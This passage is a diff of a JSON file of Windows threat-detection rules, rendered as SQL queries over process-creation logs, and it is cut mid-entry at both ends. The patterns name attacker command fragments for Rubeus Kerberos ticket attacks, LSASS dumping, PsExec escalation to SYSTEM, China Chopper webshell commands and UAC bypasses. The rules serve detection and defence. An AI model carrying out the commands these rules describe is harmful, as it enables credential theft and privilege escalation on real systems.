logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", - "author": "Florian Roth (Nextron Systems)", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "status": "experimental", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "status": "experimental", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1112", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Rare legitimate add to registry via cli (to these locations)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", - "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "status": "experimental", + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", @@ -8278,894 +8036,904 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "status": "experimental", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Very unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "status": "test", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": 